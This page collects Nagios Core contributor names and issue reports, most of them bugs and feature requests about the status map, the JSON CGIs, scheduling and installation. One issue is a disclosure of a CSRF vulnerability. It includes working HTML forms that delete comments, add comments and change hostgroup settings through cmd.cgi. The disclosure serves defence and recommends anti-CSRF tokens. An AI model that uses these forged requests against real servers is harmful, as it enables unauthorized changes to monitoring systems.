nagioscore's People

Contributors

ageric, awiddersheim, box293, c-jung, caronc, cbyers0, ccztux, dougnazar, dwittenberg2008, dylan-at-nagios, emislivec, ggvl, hedenface, iwhite-nagios, jakgibb, jomann09, jsoref, knweiss, mejo-, mjtrangoni, nagiosgwesterman, orlitzky, pmayers, rk295, sawolf, ssunganagios, tjyang, tmcnag, tonvoon, tsadpbb

nagioscore's Issues

Status map in 4.1 rc1 duplicates a host with multiple parents

Hi

I have a host with two parents in my test Nagios configuration.

define host {
host_name a
}

define host {
host_name b
parents a
}

define host {
host_name c
parents a,b
}

define host {
host_name d
parents c
}

In the previous version of Nagios, two lines led to host c.
The new version of the status map displays host c (with its child d) twice. The network graph is now confusing.

Pozda
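
The duplication described above is what one would expect if a host graph with multiple parents is drawn as a tree. The following is a minimal Python sketch, assuming the map simply expands every parent-to-child path. The function name and the `parents` dictionary are illustrative and are not taken from the Nagios source.

```python
from collections import defaultdict

def expand_as_tree(parents, root):
    """Return every root-to-host path; a host reached by N paths is drawn N times."""
    children = defaultdict(list)
    for host, host_parents in parents.items():
        for parent in host_parents:
            children[parent].append(host)

    paths = []

    def walk(host, path):
        path = path + [host]
        paths.append(path)
        for child in sorted(children[host]):
            walk(child, path)

    walk(root, [])
    return paths

# Hosts from the report: c has two parents (a and b), d hangs off c.
parents = {"a": [], "b": ["a"], "c": ["a", "b"], "d": ["c"]}
paths = expand_as_tree(parents, "a")

# Count how often each host ends a path, i.e. how often it would be drawn.
appearances = defaultdict(int)
for path in paths:
    appearances[path[-1]] += 1
print(dict(appearances))
```

In this sketch hosts c and d each end two paths, which matches the doubled display in the report. Drawing each host once and connecting it to all of its parents would avoid the duplication.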

Core 4.0.8 jsonquery.php 404 not found

Reference: Nagios Support Forum post 32973 for details.

Issue
The initial screen of jsonquery.html prompts the user to select one of the 3 CGIs: Archive, Object or Status. Selecting any of them can produce a screen showing the selection and ONLY the "SEND QUERY" button for a period of time. That is, the background processing that obtains the object data and updates the screen with further selection options can be delayed for several seconds, perhaps up to 10. Yet the "SEND QUERY" button is live the entire time, so a user unfamiliar with the application can press "SEND QUERY" prematurely and receive the error jsonquery.php 404 not found.

Our Nagios Core systems are not very large: we have 130+ hosts, with ~5600 services on a decent sized multi-cpu Linux server. However, there can be sufficient lag of several seconds (as described above) to present the user with a screen that leads them to believe the next step is to hit "SEND QUERY" without knowing further selection options will eventually be painted on the screen.

Suggestion: Gray out the "SEND QUERY" button until the background processing has filled any list boxes, and the user has made at least some selection from the new options.

Unable to sort multiple pages of services by duration down

So we have multiple pages of services flagged with problems, mainly APs, modems etc., and I would like to work from the longest flagged duration towards the shortest. If I click on Problems under the Current Status menu on the left-hand side, I can sort the first page by duration ascending, but if I then go to the second page the sort order is reset, and if I try to counter this by selecting sort by duration ascending I am brought back to the first page. Further, if while on the first page I select order by duration ascending and then limit the results to all or, say, 250, the sort order is also reset. The same happens if I limit the number first and then select sort by duration ascending.

Basically I can sort by duration ascending, but only on the first page.

Please address this, thanks.
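
The behaviour asked for here amounts to sorting the whole result set first and only then cutting out the requested page, so that the sort order and the page number can be combined. The following is a minimal Python sketch of that idea. The function name, the `duration` field and the sample data are illustrative assumptions and do not reflect how status.cgi is implemented.

```python
def page_of_services(services, page, page_size, descending=True):
    """Sort the full result set by duration, then slice out one page."""
    ordered = sorted(services, key=lambda s: s["duration"], reverse=descending)
    start = (page - 1) * page_size
    return ordered[start:start + page_size]

# Hypothetical problem services with their problem duration in seconds.
services = [
    {"name": "ap-1", "duration": 120},
    {"name": "modem-7", "duration": 86400},
    {"name": "ap-2", "duration": 3600},
    {"name": "modem-3", "duration": 600},
]
second_page = page_of_services(services, page=2, page_size=2)
print([s["name"] for s in second_page])
```

Because the sort is applied before the slice, the second page continues where the first one stopped instead of restarting the order.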

Security Vulnerability Report

Hello Nagios Team,

I am Madhu Akula, an independent security researcher, contacting you to disclose security vulnerabilities in your Nagios product.

Bug Title       : Multiple Cross-Site Request Forgery (CSRF) Vulnerabilities
Reporter Name   : Madhu Akula
Product         : Nagios
Version         : All Versions
Modules         : Nagios Web Interface
Tested On       : Windows, Linux, Mac
Browsers        : Firefox, Chrome, IE and all other also
Priority        : High
Severity        : Critical

Summary :

Multiple stored CSRF vulnerabilities allow an attacker to delete and add comments, change the settings of the Nagios server, and mount some more advanced attacks.

_Description :_

About Vulnerability :

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request.

Impact :

Attackers can trick victims into performing any state-changing operation the victim is authorized to perform, e.g., deleting and adding details like comments and logs, or changing settings.

For more reference :

https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)

Effect of Vulnerability (Proof Of Concept - PoC) :

  • Deleting All comments :-
<html>
  <body>
    <form action="http://localhost/nagios/cgi-bin/cmd.cgi" method="POST">
      <input type="hidden" name="cmd&#95;typ" value="21" />
      <input type="hidden" name="cmd&#95;mod" value="2" />
      <input type="hidden" name="host" value="hostname" />
      <input type="hidden" name="service" value="Current&#32;Load" />
      <input type="hidden" name="btnSubmit" value="Commit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  • Adding comments :-
<html>
  <body>
    <form action="http://localhost/nagios/cgi-bin/cmd.cgi" method="POST">
      <input type="hidden" name="cmd&#95;typ" value="3" />
      <input type="hidden" name="cmd&#95;mod" value="2" />
      <input type="hidden" name="host" value="hostname" />
      <input type="hidden" name="service" value="Current&#32;Load" />
      <input type="hidden" name="persistent" value="on" />
      <input type="hidden" name="com&#95;data" value="another&#32;comment" />
      <input type="hidden" name="btnSubmit" value="Commit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  • Changing Settings :-
<html>
  <body>
    <form action="http://localhost/nagios/cgi-bin/cmd.cgi" method="POST">
      <input type="hidden" name="cmd&#95;typ" value="68" />
      <input type="hidden" name="cmd&#95;mod" value="2" />
      <input type="hidden" name="hostgroup" value="linux&#45;servers" />
      <input type="hidden" name="ahas" value="on" />
      <input type="hidden" name="btnSubmit" value="Commit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Note : In the forms above, replace localhost with the server's IP address, and replace hostname with the host whose comments you want to delete. The examples target the Current Load service comments, but any other comments can be deleted the same way.

Recommendations :

Preventing CSRF usually requires the inclusion of an unpredictable token in each HTTP request. Such tokens should, at a minimum, be unique per user session.

https://www.owasp.org/index.php/CSRF_Prevention_Cheat_Sheet
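
The recommendation above can be illustrated with a per-session token check. The following is a minimal Python sketch, assuming the token is derived from the session identifier with an HMAC. That derivation is only one possible approach, and `SERVER_SECRET`, `issue_token` and `is_valid` are hypothetical names that do not exist in Nagios.

```python
import hashlib
import hmac
import secrets

# Hypothetical per-server key, generated once at startup.
SERVER_SECRET = secrets.token_bytes(32)

def issue_token(session_id):
    """Derive an unpredictable token bound to one user session."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def is_valid(session_id, submitted_token):
    """Accept a state-changing request only if its token matches the session."""
    expected = issue_token(session_id)
    # compare_digest avoids leaking the match position through timing.
    return hmac.compare_digest(expected, submitted_token)

token = issue_token("session-a")
print(is_valid("session-a", token))
print(is_valid("session-b", token))
```

A forged form like the ones in the proof of concept cannot carry the right token, because the attacker's page has no way to read it from the victim's session.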

Send alert messages through Followzup, instead of SMS

The purpose of this feature request is to enable sending alert messages through the Followzup service instead of SMS. Followzup is an open-protocol communication service designed to deliver alert messages to cell phones.
The process begins with the creation of an information channel (private or public) through which the messages are sent. Once it is created, the administrator downloads the channel's request function (a PHP file), which must be included by the Nagios send-message script.
Finally, Nagios calls the request function with the text of the message to be sent. Once requested, the message is redirected to the administrator's cell phone (source: followzup.com).
As the service is a cheap alternative for resource managers, I would like you to add this feature to Nagios, documenting where the Followzup function must be stored and providing the customized script that sends messages through it.

This is related to the post sent to the Nagios Support Forum (Fri Jun 26, 2015 3:38 pm) under the title "Send alert messages through followzup, instead of SMS", and was submitted here as directed by Nagios Sales Tech.

Inconsistent output when using % signs

Imported from the forums (user: jssingh): http://support.nagios.com/forum/viewtopic.php?f=34&t=27592

Text of issue below:

I have some output that is killing the JSON when it has % signs, which seemed odd to me that percent signs alone would kill the JSON, so I decided to test it out and the output I'm getting is wildly inconsistent (but interesting). In the examples below, I see the output correctly in the HTML page (cgi-bin/extinfo.cgi). The first one is the example of when it works correctly.

Input:
Group Share% Use

JSON Output:
"Group Share% Use"

Input:
Group Share% Use% Share

JSON Output:
"Group Share% Use�����hare"

Input:
Group Share% Use% hare

JSON Output:
"Group Share% Use 0x0.000300000003p-1022re"

Input:
Group 90%

JSON Output:
""

Input:
Testing % sign

JSON Output:
"Testing `֞ign"

Any ideas? I'm using commit 6081644, but I had this problems with % signs when I was using 4.0.4 and 4.0.7 (the release from last week).
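
Output such as 0x0.000300000003p-1022 looks like what a printf-style formatter prints for a `%a` conversion. This suggests, as an assumption not confirmed in the report, that the plugin output reaches a formatting function as the format string itself. The following is a minimal Python sketch of the usual countermeasure, doubling the percent signs first. Python's own `%` operator stands in for C's printf, and `escape_percent` is an illustrative name.

```python
def escape_percent(text):
    """Double every percent sign so a printf-style formatter prints it literally."""
    return text.replace("%", "%%")

# Inputs taken from the report above.
samples = [
    "Group Share% Use",
    "Group Share% Use% Share",
    "Group Share% Use% hare",
    "Group 90%",
    "Testing % sign",
]
for sample in samples:
    # Formatting the escaped string with no arguments gives back the original.
    restored = escape_percent(sample) % ()
    print(restored == sample)
```

The alternative is never to pass external text as the format string at all, and to hand it to the formatter as an argument of a fixed `%s` format instead.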

Bogus log messages 'Unknown jobtype: 10' when using process_performance_data (service_perfdata_command/host_perfdata_command)

Cross Post from Tracker:
http://tracker.nagios.org/view.php?id=534
Reporter: ovidiu_stanila

When using service_perfdata_command or host_perfdata_command configuration Nagios logs a warning message for each service/host check. These warning messages look like:
[1383116400] Worker 1277: Unknown jobtype: 10
[1383116400] wproc: Unknown job type: 10
[1383116400] Worker 1279: Unknown jobtype: 10
[1383116400] wproc: Unknown job type: 10
[1383116400] Worker 1278: Unknown jobtype: 10
[1383116400] wproc: Unknown job type: 10

User Submitted patch:

http://tracker.nagios.org/file_download.php?file_id=205&type=bug

command pipe corruption writing to nagios.cmd

What I found was that if you didn't submit the command with a "\n" at the end, it wouldn't work but was kept in the buffer, and later, when a correct command was issued, the previously kept data was submitted along with it.

You can see the location of "\n" in the following example:

now_epoch=$(eval date +%s); printf "[$now_epoch] ADD_HOST_COMMENT;centos03;1;nagiosadmin;This host does funny stuff\n" > /usr/local/nagios/var/rw/nagios.cmd

I think it would be prudent to clear out the contents of the buf variable in command_input_handler after each process_external_command1 run. It's certainly not ideal to have corruption pop up at all, but I don't see any reason to keep bogus commands around in that variable to (possibly) be executed later.

see http://support.nagios.com/forum/viewtopic.php?f=7&t=31900
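
On the submitting side, the problem can be avoided by building every command line through one helper that always appends the newline. The following is a minimal Python sketch, assuming the `[timestamp] COMMAND;arg;arg` layout shown in the printf example above. `format_external_command` is a hypothetical helper, not part of Nagios.

```python
import time

def format_external_command(name, *args, timestamp=None):
    """Build one external command line, always terminated by a newline."""
    if timestamp is None:
        timestamp = int(time.time())
    fields = ";".join([name, *map(str, args)])
    return f"[{timestamp}] {fields}\n"

# Same command as in the report, with a fixed timestamp for illustration.
line = format_external_command(
    "ADD_HOST_COMMENT", "centos03", 1, "nagiosadmin",
    "This host does funny stuff", timestamp=1435332000,
)
print(repr(line))
```

The resulting string can then be written to the command file in a single write, for example to /usr/local/nagios/var/rw/nagios.cmd as in the report.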

Enable json api to find empty hostgroups etc

Hello,
It seems the JSON API does not find empty hostgroups, which can be very confusing when scripting. For example, someone creates a new hostgroup for an application. Automated scripts loop through all hostgroups to assign hosts to them, but do not find the empty ones.
A workaround would be to assign a dummy host while creating the hostgroup, but this is 'sloppy' work imho. Enabling the JSON API to find empty hostgroups would be the 'logical' step.
Grtz
Willem

[feature-request] Nagios contacts case-insensitive

I use LDAP for authorization in the GUI. Users (contacts and their groups) are associated with the hosts/services.
When a user enters, for example, "Petr" and their LDAP password, they are logged in but can't see any information.
When the user enters "petr" (as specified in contacts.cfg), everything is OK and they can see the information.

Could you please add the possibility to use case-insensitive contacts for user authorization?

More information is described here: http://support.nagios.com/forum/viewtopic.php?f=34&t=33478
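
The requested behaviour could look roughly like the following. This is a minimal Python sketch of a case-insensitive lookup that maps the login name back to the contact name as it is configured. `find_contact` and the contact list are illustrative and are not taken from the Nagios CGIs.

```python
def find_contact(login, contacts):
    """Return the configured contact name matching login, ignoring case."""
    wanted = login.casefold()
    for contact in contacts:
        if contact.casefold() == wanted:
            return contact
    return None

# Contact names as they might appear in contacts.cfg.
contacts = ["petr", "nagiosadmin"]
print(find_contact("Petr", contacts))
```

Returning the configured spelling rather than the typed one means the rest of the authorization checks can keep comparing names exactly.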

Backslashes disappear

When plugin output includes backslashes, they disappear from the status information. Is this by design?

e.g. check_disk_smb

Disk ok - xxG(xx%) free on \\192.0.2.1\share
-> Disk ok - xxG(xx%) free on \192.0.2.1share
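
The observed result is consistent with the output passing through an unescape step that treats every backslash as an escape prefix. This is a hypothesis and is not confirmed in the report. The following is a minimal Python sketch that reproduces the example and shows that doubling the backslashes beforehand would preserve them. Both function names are illustrative.

```python
def naive_unescape(text):
    """Treat each backslash as an escape prefix and keep only the next character."""
    out = []
    i = 0
    while i < len(text):
        if text[i] == "\\" and i + 1 < len(text):
            out.append(text[i + 1])
            i += 2
        else:
            out.append(text[i])
            i += 1
    return "".join(out)

def escape_backslashes(text):
    """Double every backslash so that an unescape step restores the original."""
    return text.replace("\\", "\\\\")

plugin_output = r"Disk ok - xxG(xx%) free on \\192.0.2.1\share"
print(naive_unescape(plugin_output))
print(naive_unescape(escape_backslashes(plugin_output)))
```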

small typo in the statusjson.cgi output

Discovered by Sven-Göran Bergh over on the nagios forums:

http://support.nagios.com/forum/viewtopic.php?t=31550#127813

--- statusjson.c.orig   2015-02-18 14:14:58.000000000 +0100
+++ statusjson.c        2015-02-24 09:46:53.257050393 +0100
@@ -3482,7 +3482,7 @@
                        &percent_escapes, temp_servicestatus->long_plugin_output);
        json_object_append_string(json_details, "perf_data", &percent_escapes,
                        temp_servicestatus->perf_data);
-       json_object_append_integer(json_details, "max_attemps",
+       json_object_append_integer(json_details, "max_attempts",
                        temp_servicestatus->max_attempts);
        json_object_append_integer(json_details, "current_attempt",
                        temp_servicestatus->current_attempt);

configuring with empty --with-htmurl= leads to images loading problem

I want to run Nagios without the /nagios context.
My configuration options are:
./configure --with-nagios-user=nagios --with-command-group=nagioscmd --with-htmurl='' --with-cgiurl='/cgi-bin'

At the end of configuration, the summary shows:

Web Interface Options:


             HTML URL:  http://localhost/
              CGI URL:  http://localhost/cgi-bin/

Looks GOOD!

Next make all, make install, make install-commandmode, make install-config etc

Virtual Host configuration:

<VirtualHost *:80>
ServerAdmin admin@MY_DOMAIN
ServerName nagios.MY_DOMAIN

DocumentRoot /usr/local/nagios/share
<Directory />
    Options FollowSymLinks
    AllowOverride None
</Directory>

ScriptAlias /cgi-bin "/usr/local/nagios/sbin"

<Directory "/usr/local/nagios/sbin">
    Options ExecCGI
    AllowOverride None
    Order allow,deny
    Allow from all
    AuthName "Nagios Access"
    AuthType Basic
    AuthUserFile /usr/local/nagios/etc/htpasswd.users
    Require valid-user
</Directory>
<Directory "/usr/local/nagios/share">
    Options None
    AllowOverride None
    Order allow,deny
    Allow from all
    AuthName "Nagios Access"
    AuthType Basic
    AuthUserFile /usr/local/nagios/etc/htpasswd.users
    Require valid-user
</Directory>

ErrorLog ${APACHE_LOG_DIR}/nagios/error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn

CustomLog ${APACHE_LOG_DIR}/nagios/access.log combined
</VirtualHost>

All of the above leads to Nagios looking like this:

[screenshot: nagios]

SOLUTION:
Edit etc/cgi.cfg and set url_html_path to "/"

url_html_path=/

The installation script leaves it blank, which is not correct.

Nagios 4 (4.10 RC1) Startup (SuSE 13.2)

I recently upgraded a 3.5.1 machine to 4.1RC1 and thought everything was OK until last Friday, when there was a power issue: the server rebooted and Nagios did not start. I found a number of posts on the forum saying that the init.d script is only valid on Debian, but nothing from the past 18 months. Is there an init script flavor for SuSE (or RH)?

Warning messages from gcc-4.9.2 compiler

This is on fedora 21 with gcc-4.9.2

[nagiosbuild@fedora21 nagioscore]$ grep warning compile.txt
nebmods.c:109:21: warning: assignment from incompatible pointer type
commands.c:2248:12: warning: assignment discards ‘const’ qualifier from pointer target type
commands.c:2341:12: warning: assignment discards ‘const’ qualifier from pointer target type
utils.c:1117:6: warning: assuming signed overflow does not occur when assuming that (X + c) >= X is always true [-Wstrict-overflow]
../common/downtime.c:194:13: warning: ‘downtime_remove’ defined but not used [-Wunused-function]
jsonutils.c:525:3: warning: second parameter of ‘va_start’ not last named argument [-Wvarargs]
archivejson.c:3037:8: warning: variable ‘object’ set but not used [-Wunused-but-set-variable]
archivejson.c:3030:6: warning: variable ‘last_service_state’ set but not used [-Wunused-but-set-variable]
archivejson.c:3029:6: warning: variable ‘last_host_state’ set but not used [-Wunused-but-set-variable]
objectjson.c:605:6: warning: variable ‘whitespace’ set but not used [-Wunused-but-set-variable]
objectjson.c:1294:6: warning: variable ‘whitespace’ set but not used [-Wunused-but-set-variable]
statusjson.c:734:6: warning: variable ‘whitespace’ set but not used [-Wunused-but-set-variable]
statusjson.c:1278:6: warning: variable ‘whitespace’ set but not used [-Wunused-but-set-variable]
nebmods.c:109:21: warning: assignment from incompatible pointer type
commands.c:2248:12: warning: assignment discards ‘const’ qualifier from pointer target type
commands.c:2341:12: warning: assignment discards ‘const’ qualifier from pointer target type
utils.c:1117:6: warning: assuming signed overflow does not occur when assuming that (X + c) >= X is always true [-Wstrict-overflow]
../common/downtime.c:194:13: warning: ‘downtime_remove’ defined but not used [-Wunused-function]
jsonutils.c:525:3: warning: second parameter of ‘va_start’ not last named argument [-Wvarargs]
archivejson.c:3037:8: warning: variable ‘object’ set but not used [-Wunused-but-set-variable]
archivejson.c:3030:6: warning: variable ‘last_service_state’ set but not used [-Wunused-but-set-variable]
archivejson.c:3029:6: warning: variable ‘last_host_state’ set but not used [-Wunused-but-set-variable]
objectjson.c:605:6: warning: variable ‘whitespace’ set but not used [-Wunused-but-set-variable]
objectjson.c:1294:6: warning: variable ‘whitespace’ set but not used [-Wunused-but-set-variable]
statusjson.c:734:6: warning: variable ‘whitespace’ set but not used [-Wunused-but-set-variable]
statusjson.c:1278:6: warning: variable ‘whitespace’ set but not used [-Wunused-but-set-variable]
[nagiosbuild@fedora21 nagioscore]$ 

Following a pointer like the one below looks like a solution.

http://unix.stackexchange.com/questions/144454/linux-2-6-36-4-gcc-4-7-2-getting-lots-of-variable-set-but-not-used-warnings

diff --git a/cgi/archivejson.c b/cgi/archivejson.c
index 8675dd6..0cd5664 100644
--- a/cgi/archivejson.c
+++ b/cgi/archivejson.c
<snipped>
-       int whitespace;
+       int whitespace __attribute__ ((unused));

[feature-request] Spoiler in Problems page

Could you please add a spoiler to the parent service on the Problems page when the parent service is down and has more than 3 children? When each unstable host has 10-15 service checks, the Problems page is hard to read when a lot of hosts are down in large systems.
It would be clever to hide the child services under a spoiler and expand them only when needed.
An "Expand All" button and an "Always Expand All" setting are also needed.

[feature-request] Allow scheduled enable/disable for notifications

As described in the support forums (http://support.nagios.com/forum/viewtopic.php?f=7&t=33376&p=142286) it would be nice to have the same functionality already existing in scheduled downtime for checks replicated for notifications disable.

As explained in the link above, we sometimes disable notifications temporarily to run some tests and avoid spamming our users, but we later forget to re-enable them.

It seems to me like it would be fairly easy to apply the same logic as for scheduled downtimes also for the notifications disable feature, thus allowing us to set a specified amount of time for disabling alerts within a given timeframe, letting itself reactivate later.

HUP seems to cause nagios to stop talking to external queryhandlers

Not sure what causes this, but I see under strace that nagios unlink()s the filesystem end of the queryhandler socket and restarts its own workers with kill(), but my external worker (a fast SNMP checker) stops receiving queries after a HUP.

I can work around this with a timeout, but it's messy. Is Nagios supposed to retain workers across HUP, and if so, what should I look for?

Issue with Check scheduling

Request:
Possibility to disable new feature from 4.0.8 [Check scheduling has been modified to prevent bunching checks at the start of their timeperiod]

Description:
After upgrading Core to version 4.0.8, Nagios schedules checks randomly within the allowed time frame. This is by design, as described in the release notes, but it would be nice to have the possibility to disable it.

Release notes for 4.0.8:
-JSON API output has been better aligned with the standard, and output size limits have been lifted
-Check scheduling has been modified to prevent bunching checks at the start of their timeperiod
-Auto-rescheduling of checks has been reimplemented. This can be enabled by setting auto_reschedule_checks=1 in nagios.cfg, and adjusted by setting auto_rescheduling_interval and auto_rescheduling_window as described in the Core 4 Documentation. Auto-rescheduling smoothes the check schedule as it changes over time, and together with the previous improvements, helps to give a more uniform system load.

The problem I am facing is that I have some checks scheduled once a day, and with Core 4.0.6 those checks always ran at a precise time, e.g. 06:30 am. Now they are executed at varying times such as 06:43 or 06:37. I would like Nagios to schedule them automatically at exactly 06:30. Is it possible to implement a switch for [check scheduling] that disables this feature?

This is direct follow up of thread from Nagios Support forum:
http://support.nagios.com/forum/viewtopic.php?f=7&t=31266

[feature-request] Service (or host) checks should allow SOFT status for OK as well

So we have the concept of a SOFT status when a check enters a non-ok state. We can define our checks to be considered as HARD directly, by means of setting only 1 check to trigger an alert.

However, returning the check to an OK state is sort-of HARD only. Any check returning an OK value will be considered by Nagios as a HARD status and therefore immediately trigger a notification setting the problem as resolved.

I think there are some cases where we want the return to OK to be also able to make use of the SOFT status, requiring, for example, 5 OK checks for the service to be considered back to OK state.

I have heard all sorts of solutions, with flapping detection probably being the most sensible one. I still dislike doing that, since acknowledgements (with non-permanent notes) will be lost when the service flaps to OK and back to critical.

For my users in particular this is extremely inconvenient and they complain all the time to the point they stop using acknowledgement functionality and even completely ignoring nagios alerts.

It would be great to have this functionality which I believe makes complete sense since it is already present for transitions from OK to NON-OK status.
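
The requested behaviour can be sketched as a counter of consecutive OK results. The following is a minimal Python sketch that models only the recovery side, for a service that starts in a HARD problem state. `recovery_attempts` is a hypothetical setting that does not exist in Nagios, and the function name is illustrative.

```python
def hard_recovery_index(results, recovery_attempts):
    """Return the index of the result that completes the recovery, or None.

    Every OK result before that index would be a SOFT recovery; any
    non-OK result resets the count of consecutive OK results.
    """
    ok_streak = 0
    for index, result in enumerate(results):
        ok_streak = ok_streak + 1 if result == "OK" else 0
        if ok_streak >= recovery_attempts:
            return index
    return None

results = ["OK", "OK", "CRITICAL", "OK", "OK", "OK"]
print(hard_recovery_index(results, recovery_attempts=3))
print(hard_recovery_index(results, recovery_attempts=1))
```

With `recovery_attempts=1` the sketch behaves like the current behaviour described above, where the first OK result is already a HARD recovery.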

New map not working for RU locale

I have Firefox with RU as the default locale. When I try to open the new Nagios Map (the legacy map works fine), it is not shown (only a button with three lines and a loading circle for some seconds), and I see a JSON.parser error in the developer console.
When I change intl.accept_languages to "en-US, en" in Firefox, the map works fine.

Bug - Core 4.0.8 and Service Dependency

This was reported in the forums and affects Core 4.0.8.

http://support.nagios.com/forum/viewtopic.php?f=16&t=29205&p=112139#p112139

Problem:

When hostgroups are used for the hostgroup_name directive, the service dependency appears to be ignored. It does not matter whether the hosts are assigned to the hostgroup via their host object definition or inside the hostgroup definition.

By ignored, I mean that when the Master service goes down, core continues to check the services depending on it. If these are down then notifications are sent.

When I tail nagios.log I can see the notifications.

When using Core 3.5.1, when the Master service goes down, core DOES NOT continue to check the services depending on it. The next check time keeps getting pushed back.

The following config settings can be used to reproduce the issue:

define host{
use linux-server
host_name host1
alias host1
address 127.0.0.1
hostgroups my_test
}

define host{
use linux-server
host_name host2
alias host2
address 127.0.0.1
hostgroups my_test
}

define command{
command_name check-host-alive-specific
command_line $USER1$/check_ping -H $ARG1$ -w 3000.0,80% -c 5000.0,100% -p 5
}

define service{
use local-service
host_name host1
service_description master
check_command check-host-alive-specific!192.168.207.142
max_check_attempts 2
check_interval 1
retry_interval 1
flap_detection_enabled 0
notification_period 24x7
notifications_enabled 1
}

define service{
use local-service
host_name host1
service_description one
check_command check-host-alive-specific!192.168.207.143
max_check_attempts 2
check_interval 1
retry_interval 1
flap_detection_enabled 0
notification_period 24x7
notifications_enabled 1
}

define service{
use local-service
host_name host1
service_description two
check_command check-host-alive-specific!192.168.207.144
max_check_attempts 2
check_interval 1
retry_interval 1
flap_detection_enabled 0
notification_period 24x7
notifications_enabled 1
}

define service{
use local-service
host_name host2
service_description master
check_command check-host-alive-specific!192.168.207.130
max_check_attempts 2
check_interval 1
retry_interval 1
flap_detection_enabled 0
notification_period 24x7
notifications_enabled 1
}

define service{
use local-service
host_name host2
service_description one
check_command check-host-alive-specific!192.168.207.128
max_check_attempts 2
check_interval 1
retry_interval 1
flap_detection_enabled 0
notification_period 24x7
notifications_enabled 1
}

define service{
use local-service
host_name host2
service_description two
check_command check-host-alive-specific!192.168.207.131
max_check_attempts 2
check_interval 1
retry_interval 1
flap_detection_enabled 0
notification_period 24x7
notifications_enabled 1
}

define hostgroup {
hostgroup_name my_test
alias my_test
}

When done this way, it works

define servicedependency {
dependent_host_name host1,host2
dependent_service_description one,one,two,two
host_name host1,host2
service_description master
inherits_parent 1
execution_failure_criteria u,c,p,
notification_failure_criteria u,c,p,
dependency_period 24x7
}

When done this way, it works

define servicedependency {
dependent_hostgroup_name my_test
dependent_service_description one,one,two,two
host_name host1,host2
service_description master
inherits_parent 1
execution_failure_criteria u,c,p,
notification_failure_criteria u,c,p,
dependency_period 24x7
}

When done this way, it DOES NOT work

define servicedependency {
dependent_hostgroup_name my_test
dependent_service_description one,one,two,two
hostgroup_name my_test
service_description master
inherits_parent 1
execution_failure_criteria u,c,p,
notification_failure_criteria u,c,p,
dependency_period 24x7
}

Empty check_timeperiod on active checks can cause rescheduling log spam

Tested on core 4.0.8.
To reproduce:

Create a host with active checks enabled and a timeperiod like:

define timeperiod {
timeperiod_name none
alias No Time Is A Good Time
}

Now stop the nagios service, delete retention.dat, and then restart nagios. Afterwards, force an immediate check. Once checked, it will schedule the next check based on its interval. From here on, it will continue to try to check, fail due to the timeperiod, but reschedule it even though the time period is empty. Every time it tries to check, it will spam your logs with:

Warning: Check of host 'xxxx' could not be rescheduled properly. Scheduling check for [xxx]

I would argue that the check should not be rescheduled at all if Nagios cannot find a valid time in the timeperiod, instead of defaulting to rescheduling the check at the next check_interval.
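
The suggestion above can be sketched as a lookup that reports "no valid time" explicitly, so that the caller can skip rescheduling instead of falling back to the check interval. The following is a minimal Python sketch. The timeperiod representation (weekday number mapped to second ranges) and the function name are assumptions made for illustration and do not mirror the Nagios data structures.

```python
from datetime import datetime, timedelta, timezone

def next_valid_time(start, timeperiod):
    """Return the first datetime >= start inside the timeperiod, or None.

    timeperiod maps weekday numbers (0 = Monday) to lists of
    (start_second, end_second) ranges within that day.
    """
    if not any(timeperiod.values()):
        return None  # empty timeperiod: no valid time exists
    midnight = start.replace(hour=0, minute=0, second=0, microsecond=0)
    for day_offset in range(8):  # today plus the following seven days
        day = midnight + timedelta(days=day_offset)
        for begin, end in sorted(timeperiod.get(day.weekday(), [])):
            range_start = day + timedelta(seconds=begin)
            range_end = day + timedelta(seconds=end)
            if start < range_end:
                return max(start, range_start)
    return None

monday_morning = datetime(2015, 3, 2, 8, 0, tzinfo=timezone.utc)
office_hours = {0: [(9 * 3600, 17 * 3600)]}  # Mondays 09:00-17:00
print(next_valid_time(monday_morning, office_hours))
print(next_valid_time(monday_morning, {}))
```

A scheduler built on this would log the warning once and leave the check unscheduled when the function returns None.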

archivejson.cgi returns wrong host for state change query

To reproduce:
Use the jsonquery.html tool. Select:

  1. Archive JSON
  2. Host - Any available host.
  3. Any valid start/end time
  4. Submit query.

The last state change in the list is not from the host specified in the query. This happens whether or not there were any valid results for the specified host (i.e. the last state change entry is always incorrect and rather random). It is easy to filter out of the response in the ajax success method, but it is not working as intended nonetheless.

Cheers!

nagios 4.0.6 - init script bug

I posted this on the forum, and I was told to repost it here.

I'm compiling Nagios 4.0.6 from source in a CentOS 6 environment in which I don't have root or sudo privileges. Therefore, Nagios only has a few users, groups, and directories it can work with.

I compiled with the following:

./configure --prefix=/opt/nagios --with-nagios-user=monitor --with-nagios-group=monitor --with-command-user=monitor --with-command-group=monitor --with-init-dir=/home/monitor/scripts --with-lockfile=/home/monitor/nagios.lock --with-httpd-conf=/home/monitor/conf/httpd
make all
make install
mkdir -p /home/monitor/scripts
make --ignore-errors install-init
make install-commandmode
make install-config
mkdir -p /home/monitor/conf/httpd
make --ignore-errors install-webconf
make install-exfoliation

Then I try to start nagios, and get permission denied errors:

> bash /home/monitor/scripts/nagios start
Starting nagios: /home/monitor/scripts/nagios: line 89: /var/run/nagios.configtest: Permission denied
chmod: cannot access `/var/run/nagios.configtest': No such file or directory
touch: cannot touch `/var/lock/subsys/nagios': Permission denied

There seem to be several places in the init script that ignore configure flags and opt for the standard Red Hat locations instead. Some examples:

  • Line 63: NagiosLockDir is set to "/var/lock/subsys" despite setting --with-lockfile during configure.
  • Line 89-90, 97-98, 105-106: Config test tries to work with /var/run/nagios.configtest, despite setting --prefix during configure.

For my current setup, I can obviously alter the init script to make it work for myself. But I thought I would report this bug, so you could fix it in future releases.

RC 4.1.0 - install instructions will need to include installing unzip

While running 'make all' on a CentOS 6.6 machine I came across this:

make[1]: Entering directory `/tmp/nagios-4.1.0rc1/html'
(cd angularjs && unzip angular-1.3.9.zip)
/bin/sh: unzip: command not found
make[1]: *** [all] Error 127
make[1]: Leaving directory `/tmp/nagios-4.1.0rc1/html'
make: *** [all] Error 2

Doing:

yum -y install unzip

Allowed 'make all' to complete successfully.
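
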